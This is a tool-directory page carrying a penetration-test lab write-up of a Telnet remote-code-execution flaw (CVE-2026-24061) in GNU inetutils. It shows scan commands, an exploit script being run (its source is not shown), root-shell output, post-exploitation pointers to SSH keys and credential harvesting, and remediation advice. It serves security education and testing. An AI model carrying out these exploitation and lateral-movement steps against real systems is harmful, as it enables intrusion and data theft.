Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/skyejacobson/cyberhawkslab-telnetcve
侦察漏洞分析漏洞利用Web应用程序漏洞利用后渗透利用渗透测试学习与教育
GitHubskyejacobson/cyberhawkslab-telnetcve

CyberhawksLab-telnetCVE

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-24061 在 Cyberhawks 实验室中的 Writeup/发现

查看仓库
11天前尚未审核

CyberHawks 实验室演示发现报告

致谢:SafeBreach-Labs

CVE:CVE-2026-24061

实验室: Cyberhawks 实验室
目标: 10.1.1.1(demo.cyberhawks.lab)
发现编号: WU-08
日期: 2026-09-08
严重性: 严重
状态: 已确认 / 已利用


执行摘要

在对 Cyberhawks 实验室环境进行评估期间,发现目标主机(10.1.1.1)存在一个未经验证的远程代码执行(RCE)漏洞并成功利用。通过暴露的 Telnet 服务(TCP/23)利用 CVE-2026-24061,获得了 root 级别的交互式 Shell,从而完全掌控了系统管理权限。


范围与环境

字段值
目标 IP10.1.1.1
目标主机名demo.cyberhawks.lab
操作系统Linux 6.12.41+deb13-amd64(Debian 13)
攻击者操作系统Parrot OS
评估类型渗透测试(实验室环境)

侦察

端口扫描

对目标执行了 Nmap 服务版本扫描,以枚举开放端口和服务。

命令:

root@kitploit:~
nmap -sV 10.1.1.1

结果摘要:

重要观察:

  • 该主机在 15 个端口上暴露了广泛且令人担忧的攻击面。
  • 端口 23(Telnet) 可访问,使其成为首要攻击目标。
  • 在任何现代主机上存在 Telnet——一种本质上不安全、明文传输的协议——都代表着严重的配置错误。该服务版本很可能存在可利用的漏洞。

漏洞详情

描述

CVE-2026-24061 是一个未经验证的远程代码执行漏洞,影响 GNU inetutils 2.6 的 Telnet 守护进程组件。利用该漏洞可使远程未经验证的攻击者以运行服务的权限(本例中为 root)在目标系统上执行任意命令。


利用过程

使用的工具 / 漏洞利用

针对易受攻击的 Telnet 服务,执行了一个专门构建的 Python 漏洞利用脚本(telnet_rce.py),该脚本针对 CVE-2026-24061。

命令:

root@kitploit:~
python3 telnet_rce.py 10.1.1.1

漏洞利用输出:

root@kitploit:~
[*] 已连接到 10.1.1.1:23
[*] 交互式会话已启动。按 Ctrl+C 退出。

Linux 6.12.41+deb13-amd64 (demo.cyberhawks.lab) (pts/0)

root@demo:~#

利用后验证

获得 Shell 后,以下命令确认了所获得的访问级别:

身份验证:

root@kitploit:~
root@demo:~# id
uid=0(root) gid=0(root) groups=0(root)

文件系统枚举:

root@kitploit:~
root@demo:~# ls -la
total 36
drwx------  6 root root 4096 Aug 28 14:47 .
drwxr-xr-x 19 root root 4096 Aug 28 15:37 ..
-rw-r--r--  1 root root  607 May 12  2025 .bashrc
drwx------  4 root root 4096 Sep  6  2025 .cache
drwxr-xr-x  3 root root 4096 Sep  6  2025 .config
drwxrwxr-x  3 root root 4096 Sep  6  2025 .local
-rw-------  1 root root  261 Sep  6  2025 .mariadb_history
-rw-r--r--  1 root root  132 May 12  2025 .profile
drwx------  2 root root 4096 Sep  6  2025 .ssh

服务版本验证

root@kitploit:~
root@demo:~# telnet --version

telnet (GNU inetutils) 2.6
Copyright (C) 2025 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by many authors.

利用后的关键发现:

  • .mariadb_history — 表明正在使用 MariaDB 数据库;可能存在进一步收集凭据或数据外泄的机会。
  • .ssh/ 目录 — 可能包含可用于横向移动至其他主机的私钥。
  • 已确认获得完整的 root(UID 0)访问权限,无需任何提权步骤。

影响

类别评估
机密性严重 — 系统上的所有数据均可访问
完整性严重 — 攻击者可修改或销毁任何数据
可用性严重 — 攻击者可终止服务或使系统崩溃

在单个未经验证的步骤中即实现了对系统的完全入侵。能够访问该网络网段的攻击者可:

  • 读取、修改或外泄主机上存储的所有数据。
  • 从 Shell 历史记录、配置文件和 MariaDB 数据库中收集凭据。
  • 使用 SSH 密钥横向移动至网络上的其他主机。
  • 建立持久化机制(例如后门账户、cron 任务、rootkit)。
  • 破坏主机上运行的所有服务的可用性。

建议

立即措施(最高优先级)

  1. 修补或缓解 CVE-2026-24061 — 如果必须继续使用 Telnet,请应用供应商为 GNU inetutils 提供的补丁。检查是否有更新包:
    root@kitploit:~
    apt update && apt install inetutils-telnetd
    

工件与证据

工件描述
Nmap 扫描输出对 10.1.1.1 的完整端口/服务枚举
telnet_rce.py用于触发 CVE-2026-24061 的漏洞利用脚本
Shell 会话日志交互式 root Shell 记录

本报告为 Cyberhawks 实验室编写 — 仅供教育用途。

下载工具
端口状态服务
21/tcp开放FTP(tcpwrapped)
22/tcp开放SSH(tcpwrapped)
23/tcp开放Telnet
25/tcp开放SMTP(tcpwrapped)
53/tcp开放DNS(tcpwrapped)
80/tcp开放HTTP(tcpwrapped)
110/tcp开放POP3(tcpwrapped)
111/tcp开放RPC(tcpwrapped)
139/tcp开放NetBIOS(tcpwrapped)
143/tcp开放IMAP(tcpwrapped)
445/tcp开放SMB(tcpwrapped)
2049/tcp开放NFS(tcpwrapped)
3306/tcp开放MySQL/MariaDB(tcpwrapped)
3389/tcp开放RDP(tcpwrapped)
5901/tcp开放VNC(tcpwrapped)
字段详情
CVECVE-2026-24061
受影响服务Telnet(GNU inetutils 2.6,TCP/23)
漏洞类型未经验证的远程代码执行(RCE)
CVSS 评分严重
是否需要身份验证否
是否需要用户交互否